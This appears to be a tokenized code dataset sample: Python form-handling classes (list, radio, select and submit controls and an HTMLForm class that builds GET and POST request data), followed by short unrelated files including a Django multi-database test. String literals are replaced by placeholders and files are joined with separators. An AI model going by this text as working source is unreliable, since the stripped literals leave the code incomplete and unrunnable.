__dict__ [ "<STR_LIT>" ] = action <EOL> else : <EOL> if not action : <EOL> item . __dict__ [ "<STR_LIT>" ] = False <EOL> else : <EOL> for o in self . items : <EOL> o . __dict__ [ "<STR_LIT>" ] = False <EOL> item . __dict__ [ "<STR_LIT>" ] = True <EOL> def toggle_single ( self , by_label = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if len ( self . items ) != <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" % self . name ) <EOL> item = self . items [ <NUM_LIT:0> ] <EOL> self . _set_selected_state ( item , not item . selected ) <EOL> def set_single ( self , selected , by_label = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if len ( self . items ) != <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" % self . name ) <EOL> self . _set_selected_state ( self . items [ <NUM_LIT:0> ] , selected ) <EOL> def get_item_disabled ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> return self . _get ( name , by_label , nr ) . disabled <EOL> def set_item_disabled ( self , disabled , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> self . _get ( name , by_label , nr ) . disabled = disabled <EOL> def set_all_items_disabled ( self , disabled ) : <EOL> """<STR_LIT>""" <EOL> for o in self . items : <EOL> o . disabled = disabled <EOL> def get_item_attrs ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> return self . _get ( name , by_label , nr ) . attrs <EOL> def close_control ( self ) : <EOL> self . _closed = True <EOL> def add_to_form ( self , form ) : <EOL> assert self . _form is None or form == self . _form , ( <EOL> "<STR_LIT>" ) <EOL> self . _form = form <EOL> if self . name is None : <EOL> Control . add_to_form ( self , form ) <EOL> else : <EOL> for ii in range ( len ( form . 
controls ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> control = form . controls [ ii ] <EOL> if control . name == self . name and control . type == self . type : <EOL> if control . _closed : <EOL> Control . add_to_form ( self , form ) <EOL> else : <EOL> control . merge_control ( self ) <EOL> break <EOL> else : <EOL> Control . add_to_form ( self , form ) <EOL> def merge_control ( self , control ) : <EOL> assert bool ( control . multiple ) == bool ( self . multiple ) <EOL> self . items . extend ( control . items ) <EOL> def fixup ( self ) : <EOL> """<STR_LIT>""" <EOL> for o in self . items : <EOL> o . __dict__ [ "<STR_LIT>" ] = self <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:value>" : <EOL> compat = self . _form . backwards_compat <EOL> if self . name is None : <EOL> return [ ] <EOL> return [ o . name for o in self . items if o . selected and <EOL> ( not o . disabled or compat ) ] <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( self . __class__ . __name__ , name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> if self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . _set_value ( value ) <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" , "<STR_LIT>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def _set_value ( self , value ) : <EOL> if value is None or isstringlike ( value ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not value : <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if not o . disabled or compat : <EOL> o . selected = False <EOL> elif self . multiple : <EOL> self . _multiple_set_value ( value ) <EOL> elif len ( value ) > <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . 
_single_set_value ( value ) <EOL> def _get_items ( self , name , target = <NUM_LIT:1> ) : <EOL> all_items = self . get_items ( name ) <EOL> items = [ o for o in all_items if not o . disabled ] <EOL> if len ( items ) < target : <EOL> if len ( all_items ) < target : <EOL> raise ItemNotFoundError ( <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % name ) <EOL> on = [ ] <EOL> off = [ ] <EOL> for o in items : <EOL> if o . selected : <EOL> on . append ( o ) <EOL> else : <EOL> off . append ( o ) <EOL> return on , off <EOL> def _single_set_value ( self , value ) : <EOL> assert len ( value ) == <NUM_LIT:1> <EOL> on , off = self . _get_items ( value [ <NUM_LIT:0> ] ) <EOL> assert len ( on ) <= <NUM_LIT:1> <EOL> if not on : <EOL> off [ <NUM_LIT:0> ] . selected = True <EOL> def _multiple_set_value ( self , value ) : <EOL> compat = self . _form . backwards_compat <EOL> turn_on = [ ] <EOL> turn_off = [ item for item in self . items if <EOL> item . selected and ( not item . disabled or compat ) ] <EOL> names = { } <EOL> for nn in value : <EOL> if nn in names . keys ( ) : <EOL> names [ nn ] += <NUM_LIT:1> <EOL> else : <EOL> names [ nn ] = <NUM_LIT:1> <EOL> for name , count in names . items ( ) : <EOL> on , off = self . _get_items ( name , count ) <EOL> for i in range ( count ) : <EOL> if on : <EOL> item = on [ <NUM_LIT:0> ] <EOL> del on [ <NUM_LIT:0> ] <EOL> del turn_off [ turn_off . index ( item ) ] <EOL> else : <EOL> item = off [ <NUM_LIT:0> ] <EOL> del off [ <NUM_LIT:0> ] <EOL> turn_on . append ( item ) <EOL> for item in turn_off : <EOL> item . selected = False <EOL> for item in turn_on : <EOL> item . selected = True <EOL> def set_value_by_label ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if isstringlike ( value ) : <EOL> raise TypeError ( value ) <EOL> if not self . multiple and len ( value ) > <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> items = [ ] <EOL> for nn in value : <EOL> found = self . 
get_items ( label = nn ) <EOL> if len ( found ) > <NUM_LIT:1> : <EOL> if not self . _form . backwards_compat : <EOL> opt_name = found [ <NUM_LIT:0> ] . name <EOL> if [ o for o in found [ <NUM_LIT:1> : ] if o . name != opt_name ] : <EOL> raise AmbiguityError ( nn ) <EOL> else : <EOL> found = found [ : <NUM_LIT:1> ] <EOL> for o in found : <EOL> if self . _form . backwards_compat or o not in items : <EOL> items . append ( o ) <EOL> break <EOL> else : <EOL> raise ItemNotFoundError ( nn ) <EOL> self . value = [ ] <EOL> for o in items : <EOL> o . selected = True <EOL> def get_value_by_label ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if ( not o . disabled or compat ) and o . selected : <EOL> for l in o . get_labels ( ) : <EOL> if l . text : <EOL> res . append ( l . text ) <EOL> break <EOL> else : <EOL> res . append ( None ) <EOL> return res <EOL> def possible_items ( self , by_label = False ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if by_label : <EOL> res = [ ] <EOL> for o in self . items : <EOL> for l in o . get_labels ( ) : <EOL> if l . text : <EOL> res . append ( l . text ) <EOL> break <EOL> else : <EOL> res . append ( None ) <EOL> return res <EOL> return [ o . name for o in self . items ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> if self . disabled or self . name is None : <EOL> return [ ] <EOL> else : <EOL> return [ ( o . _index , self . name , o . name ) for o in self . items <EOL> if o . selected and not o . disabled ] <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> if name is None : name = "<STR_LIT>" <EOL> display = [ str ( o ) for o in self . items ] <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . 
__name__ , <EOL> name , "<STR_LIT:U+002CU+0020>" . join ( display ) , info ) <EOL> class RadioControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> attrs . setdefault ( "<STR_LIT:value>" , "<STR_LIT>" ) <EOL> ListControl . __init__ ( self , type , name , attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . __dict__ [ "<STR_LIT>" ] = False <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> def fixup ( self ) : <EOL> ListControl . fixup ( self ) <EOL> found = [ o for o in self . items if o . selected and not o . disabled ] <EOL> if not found : <EOL> if self . _select_default : <EOL> for o in self . items : <EOL> if not o . disabled : <EOL> o . selected = True <EOL> break <EOL> else : <EOL> for o in found [ : - <NUM_LIT:1> ] : <EOL> o . selected = False <EOL> def get_labels ( self ) : <EOL> return [ ] <EOL> class CheckboxControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> attrs . setdefault ( "<STR_LIT:value>" , "<STR_LIT>" ) <EOL> ListControl . __init__ ( self , type , name , attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . __dict__ [ "<STR_LIT>" ] = True <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> def get_labels ( self ) : <EOL> return [ ] <EOL> class SelectControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> self . attrs = attrs [ "<STR_LIT>" ] . copy ( ) <EOL> self . __dict__ [ "<STR_LIT>" ] = _get_label ( self . attrs ) <EOL> self . __dict__ [ "<STR_LIT:id>" ] = self . attrs . get ( "<STR_LIT:id>" ) <EOL> self . __dict__ [ "<STR_LIT>" ] = self . attrs . 
has_key ( "<STR_LIT>" ) <EOL> contents = attrs . get ( "<STR_LIT>" ) <EOL> attrs = attrs . copy ( ) <EOL> del attrs [ "<STR_LIT>" ] <EOL> ListControl . __init__ ( self , type , name , self . attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . disabled = self . attrs . has_key ( "<STR_LIT>" ) <EOL> self . readonly = self . attrs . has_key ( "<STR_LIT>" ) <EOL> if attrs . has_key ( "<STR_LIT:value>" ) : <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> label = attrs . get ( "<STR_LIT:label>" ) <EOL> if label : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : label } ) ) <EOL> if contents and contents != label : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : contents } ) ) <EOL> elif contents : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : contents } ) ) <EOL> def fixup ( self ) : <EOL> ListControl . fixup ( self ) <EOL> found = [ o for o in self . items if o . selected ] <EOL> if not found : <EOL> if not self . multiple or self . _select_default : <EOL> for o in self . items : <EOL> if not o . disabled : <EOL> was_disabled = self . disabled <EOL> self . disabled = False <EOL> try : <EOL> o . selected = True <EOL> finally : <EOL> o . disabled = was_disabled <EOL> break <EOL> elif not self . multiple : <EOL> for o in found [ : - <NUM_LIT:1> ] : <EOL> o . selected = False <EOL> class SubmitControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . value is None : self . value = "<STR_LIT>" <EOL> self . readonly = True <EOL> def get_labels ( self ) : <EOL> res = [ ] <EOL> if self . value : <EOL> res . append ( Label ( { "<STR_LIT>" : self . value } ) ) <EOL> res . extend ( ScalarControl . 
get_labels ( self ) ) <EOL> return res <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT>" <EOL> def _click ( self , form , coord , return_type , request_class = urllib2 . Request ) : <EOL> self . _clicked = coord <EOL> r = form . _switch_click ( return_type , request_class ) <EOL> self . _clicked = False <EOL> return r <EOL> def _totally_ordered_pairs ( self ) : <EOL> if not self . _clicked : <EOL> return [ ] <EOL> return ScalarControl . _totally_ordered_pairs ( self ) <EOL> class ImageControl ( SubmitControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> SubmitControl . __init__ ( self , type , name , attrs , index ) <EOL> self . readonly = False <EOL> def _totally_ordered_pairs ( self ) : <EOL> clicked = self . _clicked <EOL> if self . disabled or not clicked : <EOL> return [ ] <EOL> name = self . name <EOL> if name is None : return [ ] <EOL> pairs = [ <EOL> ( self . _index , "<STR_LIT>" % name , str ( clicked [ <NUM_LIT:0> ] ) ) , <EOL> ( self . _index + <NUM_LIT:1> , "<STR_LIT>" % name , str ( clicked [ <NUM_LIT:1> ] ) ) , <EOL> ] <EOL> value = self . _value <EOL> if value : <EOL> pairs . append ( ( self . _index + <NUM_LIT:2> , name , value ) ) <EOL> return pairs <EOL> get_labels = ScalarControl . get_labels <EOL> class PasswordControl ( TextControl ) : pass <EOL> class HiddenControl ( TextControl ) : pass <EOL> class TextareaControl ( TextControl ) : pass <EOL> class SubmitButtonControl ( SubmitControl ) : pass <EOL> def is_listcontrol ( control ) : return control . 
is_of_kind ( "<STR_LIT:list>" ) <EOL> class HTMLForm : <EOL> """<STR_LIT>""" <EOL> type2class = { <EOL> "<STR_LIT:text>" : TextControl , <EOL> "<STR_LIT:password>" : PasswordControl , <EOL> "<STR_LIT>" : HiddenControl , <EOL> "<STR_LIT>" : TextareaControl , <EOL> "<STR_LIT>" : IsindexControl , <EOL> "<STR_LIT:file>" : FileControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : SubmitControl , <EOL> "<STR_LIT>" : SubmitButtonControl , <EOL> "<STR_LIT:image>" : ImageControl , <EOL> "<STR_LIT>" : RadioControl , <EOL> "<STR_LIT>" : CheckboxControl , <EOL> "<STR_LIT>" : SelectControl , <EOL> } <EOL> def __init__ ( self , action , method = "<STR_LIT:GET>" , <EOL> enctype = "<STR_LIT>" , <EOL> name = None , attrs = None , <EOL> request_class = urllib2 . Request , <EOL> forms = None , labels = None , id_to_labels = None , <EOL> backwards_compat = True ) : <EOL> """<STR_LIT>""" <EOL> self . action = action <EOL> self . method = method <EOL> self . enctype = enctype <EOL> self . name = name <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> self . controls = [ ] <EOL> self . _request_class = request_class <EOL> self . _forms = forms <EOL> self . _labels = labels <EOL> self . _id_to_labels = id_to_labels <EOL> self . backwards_compat = backwards_compat <EOL> self . _urlunparse = urlparse . urlunparse <EOL> self . _urlparse = urlparse . urlparse <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return self . _backwards_compat <EOL> return getattr ( HTMLForm , name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> name = "<STR_LIT>" <EOL> value = bool ( value ) <EOL> for cc in self . controls : <EOL> try : <EOL> items = cc . items <EOL> except AttributeError : <EOL> continue <EOL> else : <EOL> for ii in items : <EOL> for ll in ii . 
get_labels ( ) : <EOL> ll . _backwards_compat = value <EOL> self . __dict__ [ name ] = value <EOL> def new_control ( self , type , name , attrs , <EOL> ignore_unknown = False , select_default = False , index = None ) : <EOL> """<STR_LIT>""" <EOL> type = type . lower ( ) <EOL> klass = self . type2class . get ( type ) <EOL> if klass is None : <EOL> if ignore_unknown : <EOL> klass = IgnoreControl <EOL> else : <EOL> klass = TextControl <EOL> a = attrs . copy ( ) <EOL> if issubclass ( klass , ListControl ) : <EOL> control = klass ( type , name , a , select_default , index ) <EOL> else : <EOL> control = klass ( type , name , a , index ) <EOL> if type == "<STR_LIT>" and len ( attrs ) == <NUM_LIT:1> : <EOL> for ii in range ( len ( self . controls ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> ctl = self . controls [ ii ] <EOL> if ctl . type == "<STR_LIT>" : <EOL> ctl . close_control ( ) <EOL> break <EOL> control . add_to_form ( self ) <EOL> control . _urlparse = self . _urlparse <EOL> control . _urlunparse = self . _urlunparse <EOL> def fixup ( self ) : <EOL> """<STR_LIT>""" <EOL> for control in self . controls : <EOL> control . fixup ( ) <EOL> self . backwards_compat = self . _backwards_compat <EOL> def __str__ ( self ) : <EOL> header = "<STR_LIT>" % ( <EOL> ( self . name and self . name + "<STR_LIT:U+0020>" or "<STR_LIT>" ) , <EOL> self . method , self . action , self . enctype ) <EOL> rep = [ header ] <EOL> for control in self . controls : <EOL> rep . append ( "<STR_LIT>" % str ( control ) ) <EOL> return "<STR_LIT>" % "<STR_LIT:\n>" . join ( rep ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . find_control ( name ) . value <EOL> def __contains__ ( self , name ) : <EOL> return bool ( self . find_control ( name ) ) <EOL> def __setitem__ ( self , name , value ) : <EOL> control = self . find_control ( name ) <EOL> try : <EOL> control . 
value = value <EOL> except AttributeError , e : <EOL> raise ValueError ( str ( e ) ) <EOL> def get_value ( self , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if by_label : <EOL> deprecation ( "<STR_LIT>" ) <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> if by_label : <EOL> try : <EOL> meth = c . get_value_by_label <EOL> except AttributeError : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % c . name ) <EOL> else : <EOL> return meth ( ) <EOL> else : <EOL> return c . value <EOL> def set_value ( self , value , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if by_label : <EOL> deprecation ( "<STR_LIT>" ) <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> if by_label : <EOL> try : <EOL> meth = c . set_value_by_label <EOL> except AttributeError : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % c . name ) <EOL> else : <EOL> meth ( value ) <EOL> else : <EOL> c . value = value <EOL> def get_value_by_label ( <EOL> self , name = None , type = None , kind = None , id = None , label = None , nr = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> return c . get_value_by_label ( ) <EOL> def set_value_by_label ( <EOL> self , value , <EOL> name = None , type = None , kind = None , id = None , label = None , nr = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> c . set_value_by_label ( value ) <EOL> def set_all_readonly ( self , readonly ) : <EOL> for control in self . controls : <EOL> control . readonly = bool ( readonly ) <EOL> def clear_all ( self ) : <EOL> """<STR_LIT>""" <EOL> for control in self . controls : <EOL> control . 
clear ( ) <EOL> def clear ( self , <EOL> name = None , type = None , kind = None , id = None , nr = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> c . clear ( ) <EOL> def possible_items ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . _find_list_control ( name , type , kind , id , label , nr ) <EOL> return c . possible_items ( by_label ) <EOL> def set ( self , selected , item_name , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . set ( <EOL> selected , item_name , by_label ) <EOL> def toggle ( self , item_name , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . toggle ( <EOL> item_name , by_label ) <EOL> def set_single ( self , selected , <EOL> name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( <EOL> name , type , kind , id , label , nr ) . set_single ( selected ) <EOL> def toggle_single ( self , name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . toggle_single ( ) <EOL> def add_file ( self , file_object , content_type = None , filename = None , <EOL> name = None , id = None , nr = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . find_control ( name , "<STR_LIT:file>" , id = id , label = label , nr = nr ) . 
add_file ( <EOL> file_object , content_type , filename ) <EOL> def click ( self , name = None , type = None , id = None , nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> request_class = urllib2 . Request , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def click_request_data ( self , <EOL> name = None , type = None , id = None , <EOL> nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> request_class = urllib2 . Request , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def click_pairs ( self , name = None , type = None , id = None , <EOL> nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def find_control ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> predicate = None , nr = None , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if ( ( name is None ) and ( type is None ) and ( kind is None ) and <EOL> ( id is None ) and ( label is None ) and ( predicate is None ) and <EOL> ( nr is None ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return self . _find_control ( name , type , kind , id , label , predicate , nr ) <EOL> def _find_list_control ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> label = None , nr = None ) : <EOL> if ( ( name is None ) and ( type is None ) and ( kind is None ) and <EOL> ( id is None ) and ( label is None ) and ( nr is None ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return self . 
_find_control ( name , type , kind , id , label , <EOL> is_listcontrol , nr ) <EOL> def _find_control ( self , name , type , kind , id , label , predicate , nr ) : <EOL> if ( ( name is not None ) and ( name is not Missing ) and <EOL> not isstringlike ( name ) ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( type is not None ) and not isstringlike ( type ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( kind is not None ) and not isstringlike ( kind ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( id is not None ) and not isstringlike ( id ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( label is not None ) and not isstringlike ( label ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( predicate is not None ) and not callable ( predicate ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( nr is not None ) and nr < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> orig_nr = nr <EOL> found = None <EOL> ambiguous = False <EOL> if nr is None and self . backwards_compat : <EOL> nr = <NUM_LIT:0> <EOL> for control in self . controls : <EOL> if ( ( name is not None and name != control . name ) and <EOL> ( name is not Missing or control . name is not None ) ) : <EOL> continue <EOL> if type is not None and type != control . type : <EOL> continue <EOL> if kind is not None and not control . is_of_kind ( kind ) : <EOL> continue <EOL> if id is not None and id != control . id : <EOL> continue <EOL> if predicate and not predicate ( control ) : <EOL> continue <EOL> if label : <EOL> for l in control . get_labels ( ) : <EOL> if l . text . find ( label ) > - <NUM_LIT:1> : <EOL> break <EOL> else : <EOL> continue <EOL> if nr is not None : <EOL> if nr == <NUM_LIT:0> : <EOL> return control <EOL> nr -= <NUM_LIT:1> <EOL> continue <EOL> if found : <EOL> ambiguous = True <EOL> break <EOL> found = control <EOL> if found and not ambiguous : <EOL> return found <EOL> description = [ ] <EOL> if name is not None : description . 
append ( "<STR_LIT>" % repr ( name ) ) <EOL> if type is not None : description . append ( "<STR_LIT>" % type ) <EOL> if kind is not None : description . append ( "<STR_LIT>" % kind ) <EOL> if id is not None : description . append ( "<STR_LIT>" % id ) <EOL> if label is not None : description . append ( "<STR_LIT>" % label ) <EOL> if predicate is not None : <EOL> description . append ( "<STR_LIT>" % predicate ) <EOL> if orig_nr : description . append ( "<STR_LIT>" % orig_nr ) <EOL> description = "<STR_LIT:U+002CU+0020>" . join ( description ) <EOL> if ambiguous : <EOL> raise AmbiguityError ( "<STR_LIT>" + description ) <EOL> elif not found : <EOL> raise ControlNotFoundError ( "<STR_LIT>" + description ) <EOL> assert False <EOL> def _click ( self , name , type , id , label , nr , coord , return_type , <EOL> request_class = urllib2 . Request ) : <EOL> try : <EOL> control = self . _find_control ( <EOL> name , type , "<STR_LIT>" , id , label , None , nr ) <EOL> except ControlNotFoundError : <EOL> if ( ( name is not None ) or ( type is not None ) or ( id is not None ) or <EOL> ( nr != <NUM_LIT:0> ) ) : <EOL> raise <EOL> return self . _switch_click ( return_type , request_class ) <EOL> else : <EOL> return control . _click ( self , coord , return_type , request_class ) <EOL> def _pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( k , v ) for ( i , k , v , c_i ) in self . _pairs_and_controls ( ) ] <EOL> def _pairs_and_controls ( self ) : <EOL> """<STR_LIT>""" <EOL> pairs = [ ] <EOL> for control_index in range ( len ( self . controls ) ) : <EOL> control = self . controls [ control_index ] <EOL> for ii , key , val in control . _totally_ordered_pairs ( ) : <EOL> pairs . append ( ( ii , key , val , control_index ) ) <EOL> pairs . sort ( ) <EOL> return pairs <EOL> def _request_data ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . method . upper ( ) <EOL> parts = self . _urlparse ( self . 
action ) <EOL> rest , ( query , frag ) = parts [ : - <NUM_LIT:2> ] , parts [ - <NUM_LIT:2> : ] <EOL> if method == "<STR_LIT:GET>" : <EOL> if self . enctype != "<STR_LIT>" : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % self . enctype ) <EOL> parts = rest + ( urlencode ( self . _pairs ( ) ) , None ) <EOL> uri = self . _urlunparse ( parts ) <EOL> return uri , None , [ ] <EOL> elif method == "<STR_LIT:POST>" : <EOL> parts = rest + ( query , None ) <EOL> uri = self . _urlunparse ( parts ) <EOL> if self . enctype == "<STR_LIT>" : <EOL> return ( uri , urlencode ( self . _pairs ( ) ) , <EOL> [ ( "<STR_LIT:Content-Type>" , self . enctype ) ] ) <EOL> elif self . enctype == "<STR_LIT>" : <EOL> data = StringIO ( ) <EOL> http_hdrs = [ ] <EOL> mw = MimeWriter ( data , http_hdrs ) <EOL> f = mw . startmultipartbody ( "<STR_LIT>" , add_to_http_hdrs = True , <EOL> prefix = <NUM_LIT:0> ) <EOL> for ii , k , v , control_index in self . _pairs_and_controls ( ) : <EOL> self . controls [ control_index ] . _write_mime_data ( mw , k , v ) <EOL> mw . lastpart ( ) <EOL> return uri , data . getvalue ( ) , http_hdrs <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % self . enctype ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> def _switch_click ( self , return_type , request_class = urllib2 . Request ) : <EOL> if return_type == "<STR_LIT>" : <EOL> return self . _pairs ( ) <EOL> elif return_type == "<STR_LIT>" : <EOL> return self . _request_data ( ) <EOL> else : <EOL> req_data = self . _request_data ( ) <EOL> req = request_class ( req_data [ <NUM_LIT:0> ] , req_data [ <NUM_LIT:1> ] ) <EOL> for key , val in req_data [ <NUM_LIT:2> ] : <EOL> add_hdr = req . add_header <EOL> if key . lower ( ) == "<STR_LIT>" : <EOL> try : <EOL> add_hdr = req . add_unredirected_header <EOL> except AttributeError : <EOL> pass <EOL> add_hdr ( key , val ) <EOL> return req </s>
<s> """<STR_LIT>""" <EOL> from . lazyviews import LazyViews <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' </s>
<s> from rororo . schemas . empty import EMPTY_OBJECT <EOL> request = None <EOL> response = EMPTY_OBJECT </s>
<s> from tddspry . django import TestCase <EOL> from tddspry . django . helpers import EMAIL , PASSWORD , USERNAME <EOL> from django . contrib . auth . models import User <EOL> class TestModels ( TestCase ) : <EOL> multidb = True <EOL> def setup ( self ) : <EOL> self . model = User <EOL> self . manager = self . model . objects . using ( '<STR_LIT>' ) <EOL> self . kwargs = { '<STR_LIT:username>' : USERNAME , <EOL> '<STR_LIT:password>' : PASSWORD , <EOL> '<STR_LIT:email>' : EMAIL } <EOL> self . sgrawk = { '<STR_LIT:username>' : USERNAME [ : : - <NUM_LIT:1> ] , <EOL> '<STR_LIT:password>' : PASSWORD [ : : - <NUM_LIT:1> ] , <EOL> '<STR_LIT:email>' : EMAIL [ : : - <NUM_LIT:1> ] } <EOL> def test_using_keyword ( self ) : <EOL> self . assert_count ( self . model , <NUM_LIT:0> ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> self . assert_create ( self . model , using = '<STR_LIT>' , ** self . kwargs ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> ) <EOL> self . assert_not_count ( self . model , 